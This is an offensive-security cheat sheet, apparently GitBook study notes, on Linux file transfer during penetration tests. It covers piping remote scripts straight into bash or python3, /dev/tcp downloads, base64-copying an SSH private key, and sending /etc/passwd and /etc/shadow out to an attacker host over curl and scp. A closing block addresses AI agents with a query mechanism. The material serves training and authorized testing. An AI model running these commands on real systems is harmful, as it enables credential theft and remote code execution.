# Linux File Transfer

## Transfer files to target machine

### **Base64 Encoding / Decoding**

```bash
# Check File MD5 hash
md5sum id_rsa

# Encode SSH Key to Base64
cat id_rsa |base64 -w 0;echo

# We copy this content, paste it onto our Linux target machine, and use base64 with the option `-d' to decode it.

# Decode the File
echo -n 'LS0t---S0tLQo=' | base64 -d > id_rsa

# Confirm the MD5 Hashes Match
md5sum id_rsa
```

### **Web Downloads with Wget and cURL**

```bash
# Download a File Using cURL
curl -o /tmp/LinEnum.sh /rebootuser/LinEnum/master/LinEnum.sh

# Download a File Using wget
wget <https://rebootuser/LinEnum/master/LinEnum.sh> -O /tmp/LinEnum.sh
```

### **Fileless Attacks Using Linux**

```bash
# Fileless Download with cURL
curl https://URL/LinEnum.sh | bash

# Fileless Download with wget
wget -qO- https://URL/helloworld.py | python3
```

### **Download with Bash (/dev/tcp)**

```bash
# Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80

# HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\\n\\n">&3

# Print the Response
cat <&3
```

### **SSH Downloads**

```bash
# Enabling the SSH Server
sudo systemctl enable ssh

# Starting the SSH Server
sudo systemctl start ssh

# Checking for SSH Listening Port
netstat -lnpt

# Downloading Files Using SCP
scp plaintext@192.168.49.128:/root/myroot.txt .
```

## Get files from target host to our attack machine

### **Web Upload**

```bash
# Install uploadserver
python3 -m pip install --user uploadserver

# Create a Self-Signed Certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# creating a new directory to host the file for our webserver.
mkdir https && cd https

# start web server
python3 -m uploadserver 443 --server-certificate /root/server.pem

# Upload Multiple Files - from target host
curl -X POST <https://192.168.49.128/upload> -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

### Alternative **Web Server Method**

```bash
# Creating a Web Server with Python3
python3 -m http.server

# Creating a Web Server with Python2.7
python2.7 -m SimpleHTTPServer

# Creating a Web Server with PHP
php -S 0.0.0.0:8000

# Creating a Web Server with Ruby
ruby -run -ehttpd . -p8000

# Download the File from the Target Machine onto the Pwnbox
wget 192.168.49.128:8000/filetotransfer.txt
```

### SCP Upload

```bash
# We may find some companies that allow the SSH protocol (TCP/22) for outbound connections, and if that's the case, we can use an SSH server with the scp utility to upload files. Let's attempt to upload a file using the SSH protocol.
# run the comand and enter user and pass
scp /etc/passwd user@192.168.49.128:/home/user/
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://strange-1.gitbook.io/notes/file-transfers/linux-file-transfer.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.